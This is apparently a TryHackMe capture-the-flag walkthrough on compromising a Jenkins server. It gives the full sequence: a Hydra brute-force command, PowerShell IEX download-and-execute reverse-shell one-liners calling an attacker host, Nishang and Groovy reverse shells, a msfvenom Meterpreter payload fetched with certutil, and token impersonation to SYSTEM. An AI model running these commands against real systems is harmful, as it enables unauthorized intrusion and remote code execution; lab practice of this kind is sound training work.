Exploiting Jenkins | Advanced Exploitation | TryHackMe
In this room we learn how to exploit Jenkins: first gain initial access as a user, then escalate privileges by abusing a common misconfiguration on this widely used automation server. (Jenkins is used to build continuous integration/continuous delivery pipelines that let developers build, test and deploy their code automatically whenever they change it.)
Gaining Initial Access
In this section I will demonstrate three ways to gain initial access to the Jenkins server.
To start, we use Nmap to survey the open ports, the services and versions behind them, and any other interesting information it can pull out.
$nmap -sV -sC -sS -T4 -Pn 10.10.136.50
The Nmap scan finds three open ports, two of which look interesting: port 80 running an HTTP server and port 8080 running an HTTP server (Jetty). A closer look at both shows that http://10.10.136.50:8080 is the Jenkins login page.
We need credentials to get past the login page. Before brute-forcing, try commonly used credentials such as user:user, admin:admin and admin:Pa$$word; if none of these work, look up the default Jenkins logins online, and only then brute-force. In Jenkins' case this is an easy pass: admin:admin goes through. For the sake of learning, I will also demonstrate how to gain access by brute-forcing with Burp Suite and Hydra.
Bruteforce for logins with Burp Suite and Hydra
Burp Suite and Hydra are both powerful tools whose usefulness should not be underestimated. Let's begin.
Turn on Intercept in Burp Suite's Proxy tab, browse to the Jenkins address in Firefox, and forward the intercepted GET request.
Once the page loads you get the login form; enter any credentials. In my case I used test:test, as shown below.
With the failed login captured, find the POST request in Proxy > HTTP history and send it to Intruder, where we set the payload position on the password parameter. The same request also shows us the form's action path, parameter names and the failure response, which is exactly what Hydra needs.
Alternatively, on your terminal, use the command below. The action path, parameter names and failure marker are taken from the intercepted POST (Jenkins redirects to /loginError on a bad login); adjust them if yours differ, since newer Jenkins versions post to /j_spring_security_check instead of /j_acegi_security_check. Jenkins listens on 8080 here, hence -s 8080.
hydra -l <username> -P /usr/share/wordlists/<wordlist> <ip> -s 8080 http-post-form "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:F=loginError"
As expected, the password for the username admin is admin.
Get a Reverse Shell
Now that we are logged into the admin panel, we look for a feature of the tool that executes commands on the underlying system and use it to run our payload. In Jenkins, a freestyle project's build step "Execute Windows batch command" does exactly that: whatever we put there runs on the server when the project is built.
I will demonstrate three ways, or types of command, to get a shell.
Using PowerShell Reverse TCP
These commands are lengthy and not worth memorising, so go to your browser and search for "powershell iex reverse shell". You will get plenty of results; I normally use https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3
First we need the PowerShell reverse TCP script in our working directory (either paste the code into a file with nano or download it from GitHub) and rename it powershell_reverse_tcp.ps1:
wget https://raw.githubusercontent.com/ivan-sincek/powershell-reverse-tcp/master/src/invoke_expression/prompt/powershell_reverse_tcp_prompt.ps1
Once the script has downloaded, open it and replace the IP address in it with our local (Kali) IP address. Save the file, then start the Python web server and a netcat listener on the port you chose.
$python3 -m http.server 80
Time to run the script from the Jenkins panel: paste the command below into the build step and build the project.
powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3/powershell_reverse_tcp.ps1');powershell_reverse_tcp -Reverse -IPAddress <ip> -PORT <port>
Bingo! We get a connection back, and the user flag is ours.
Get shell with Invoke-PowerShellTcp (Nishang)
We need the Nishang PowerShell script in our current working directory; the command below downloads it.
wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
Now run the command below from the Windows batch build step in Jenkins, making sure LHOST and LPORT are correct and that your netcat listener and web server are running.
powershell iex (New-Object Net.WebClient).DownloadString('http://192.168.1.3/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.1.3 -Port 4444
There you have your initial access.
Exploiting with Groovy Scripts
Under Manage Jenkins we find an interesting entry called "Script Console". It runs Groovy scripts directly inside the Jenkins process, so with an administrator account (which is what the console requires) we can get a shell in a heartbeat.
Search the web for a Groovy reverse shell to use here.
Enter your LHOST and LPORT in the script, run it in the console and catch the reverse shell on your listener. Note: you will not need the Python web server in this case, because the Groovy script opens the connection itself instead of downloading a second stage.
Spawn a Meterpreter Shell
From here, it only gets interesting.
First generate a payload with msfvenom on the Kali machine:
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=IP LPORT=PORT -f exe -o shell-name.exe
Then start Metasploit, which we will use for the handler:
msfconsole
Once we have our payload, we need to transfer it to the Windows machine with the certutil tool. First start your web server on Kali, then run the command below in your Windows shell (ip:port is the Kali address and web server port):
certutil -urlcache -f http://ip:port/shell-name.exe shell-name.exe
Now that the payload is on the Windows machine, configure Metasploit: use exploit/multi/handler, set payload windows/meterpreter/reverse_tcp, set LHOST and LPORT to the same values given to msfvenom, then run the exploit.
This is where things get interesting: to trigger the payload we run Start-Process "shell-name.exe" in our PowerShell reverse shell on the target.
Bingo! We get our Meterpreter session. Time to escalate our privileges.
Privilege Escalation
The end goal is always administrator privileges. Windows decides what a process may do from that process's primary token, not from a token we impersonate, so we also migrate into a process that already runs as SYSTEM; in my case I like migrating into spoolsv.exe because it is a stable process.
Let's load incognito and list the tokens we can impersonate (list_tokens -g).
>load incognito
We get lots of tokens, but we are only interested in one: the BUILTIN\Administrators delegation token. This looks like something worth impersonating, so we run impersonate_token "BUILTIN\Administrators".
Once this is done, whoami reports NT AUTHORITY\SYSTEM.
We now hold administrator privileges and can read the Administrator's files as we please.
Thank you for taking the time to read this walkthrough; we compromised this machine using Metasploit. I will write another walkthrough demonstrating how to compromise the same machine manually.
Happy Hacking! Cheers.